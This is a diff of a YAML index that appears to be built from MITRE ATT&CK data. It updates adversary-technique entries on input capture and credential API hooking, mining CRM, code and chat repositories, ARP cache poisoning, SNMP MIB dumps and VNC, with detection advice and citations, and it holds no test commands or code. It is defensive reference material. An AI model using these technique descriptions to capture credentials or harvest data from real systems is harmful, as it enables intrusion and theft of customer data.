         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -46042,13 +46593,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -46056,15 +46607,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -46075,9 +46622,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -46123,7 +46721,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -46142,37 +46740,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -46195,41 +46792,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -46258,10 +46866,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -46274,10 +46881,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -46286,11 +46903,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -46327,7 +46947,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -46359,115 +46979,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -46478,6 +47165,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
